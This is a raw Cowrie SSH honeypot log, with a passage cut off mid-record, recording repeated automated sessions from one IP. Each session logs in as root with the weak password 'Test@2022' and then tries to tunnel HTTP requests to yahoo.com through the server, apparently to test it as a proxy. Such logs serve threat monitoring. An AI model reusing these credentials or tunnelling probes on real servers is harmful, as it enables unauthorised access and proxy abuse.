{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30119,"dst_ip":"1.2.3.4","dst_port":22,"session":"62cd566d9842","protocol":"ssh","message":"New connection: 213.209.150.239:30119 (1.2.3.4:22) [session: 62cd566d9842]","sensor":"my-vps","timestamp":"2025-08-26T01:04:10.000938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:10.001811Z","src_ip":"213.209.150.239","session":"62cd566d9842"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:10.058784Z","src_ip":"213.209.150.239","session":"62cd566d9842"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:10.340808Z","src_ip":"213.209.150.239","session":"62cd566d9842"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":4741,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:4741","sensor":"my-vps","timestamp":"2025-08-26T01:04:10.398460Z","session":"62cd566d9842"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:10.455166Z","src_ip":"213.209.150.239","session":"62cd566d9842"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":3783,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:3783","sensor":"my-vps","timestamp":"2025-08-26T01:04:10.610871Z","session":"62cd566d9842"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:10.667499Z","src_ip":"213.209.150.239","session":"62cd566d9842"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:10.725468Z","src_ip":"213.209.150.239","session":"62cd566d9842"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30167,"dst_ip":"1.2.3.4","dst_port":22,"session":"005228155516","protocol":"ssh","message":"New connection: 213.209.150.239:30167 (1.2.3.4:22) [session: 005228155516]","sensor":"my-vps","timestamp":"2025-08-26T01:04:10.771407Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:10.781341Z","src_ip":"213.209.150.239","session":"005228155516"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:10.818895Z","src_ip":"213.209.150.239","session":"005228155516"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:11.053935Z","src_ip":"213.209.150.239","session":"005228155516"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":25567,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:25567","sensor":"my-vps","timestamp":"2025-08-26T01:04:11.102730Z","session":"005228155516"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:11.150087Z","src_ip":"213.209.150.239","session":"005228155516"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":2817,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:2817","sensor":"my-vps","timestamp":"2025-08-26T01:04:11.285498Z","session":"005228155516"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:11.332897Z","src_ip":"213.209.150.239","session":"005228155516"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:11.381238Z","src_ip":"213.209.150.239","session":"005228155516"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30218,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3c0c348a4f0","protocol":"ssh","message":"New connection: 213.209.150.239:30218 (1.2.3.4:22) [session: f3c0c348a4f0]","sensor":"my-vps","timestamp":"2025-08-26T01:04:11.427390Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:11.428332Z","src_ip":"213.209.150.239","session":"f3c0c348a4f0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:11.475719Z","src_ip":"213.209.150.239","session":"f3c0c348a4f0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:11.709966Z","src_ip":"213.209.150.239","session":"f3c0c348a4f0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":16269,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:16269","sensor":"my-vps","timestamp":"2025-08-26T01:04:11.757852Z","session":"f3c0c348a4f0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:11.805082Z","src_ip":"213.209.150.239","session":"f3c0c348a4f0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":29665,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:29665","sensor":"my-vps","timestamp":"2025-08-26T01:04:11.941525Z","session":"f3c0c348a4f0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:11.988803Z","src_ip":"213.209.150.239","session":"f3c0c348a4f0"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:12.037606Z","src_ip":"213.209.150.239","session":"f3c0c348a4f0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30268,"dst_ip":"1.2.3.4","dst_port":22,"session":"8258492ab737","protocol":"ssh","message":"New connection: 213.209.150.239:30268 (1.2.3.4:22) [session: 8258492ab737]","sensor":"my-vps","timestamp":"2025-08-26T01:04:12.093094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:12.094298Z","src_ip":"213.209.150.239","session":"8258492ab737"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:12.151034Z","src_ip":"213.209.150.239","session":"8258492ab737"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:12.434598Z","src_ip":"213.209.150.239","session":"8258492ab737"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":2569,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:2569","sensor":"my-vps","timestamp":"2025-08-26T01:04:12.492162Z","session":"8258492ab737"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:12.549075Z","src_ip":"213.209.150.239","session":"8258492ab737"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":22208,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:22208","sensor":"my-vps","timestamp":"2025-08-26T01:04:12.703158Z","session":"8258492ab737"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:12.759981Z","src_ip":"213.209.150.239","session":"8258492ab737"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:12.818316Z","src_ip":"213.209.150.239","session":"8258492ab737"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30322,"dst_ip":"1.2.3.4","dst_port":22,"session":"9512811dfa4f","protocol":"ssh","message":"New connection: 213.209.150.239:30322 (1.2.3.4:22) [session: 9512811dfa4f]","sensor":"my-vps","timestamp":"2025-08-26T01:04:12.864393Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:12.865350Z","src_ip":"213.209.150.239","session":"9512811dfa4f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:04:12.912506Z","src_ip":"213.209.150.239","session":"9512811dfa4f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:04:13.147587Z","src_ip":"213.209.150.239","session":"9512811dfa4f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":27034,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:27034","sensor":"my-vps","timestamp":"2025-08-26T01:04:13.196037Z","session":"9512811dfa4f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:13.243442Z","src_ip":"213.209.150.239","session":"9512811dfa4f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":11083,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:11083","sensor":"my-vps","timestamp":"2025-08-26T01:04:13.381538Z","session":"9512811dfa4f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:04:13.428826Z","src_ip":"213.209.150.239","session":"9512811dfa4f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:04:13.476712Z","src_ip":"213.209.150.239","session":"9512811dfa4f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":30357,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4c3501fe289","protocol":"ssh","message":"New connection: 213.209.150.239:30357 (1.2.3.4:22) [session: b4c3501fe289]","sensor":"my-vps","timestamp":"2025-08-26T01:04:13.522832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:04:13.523571Z","src_ip":"213.209.150.239","session":"b4c3501fe289"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128"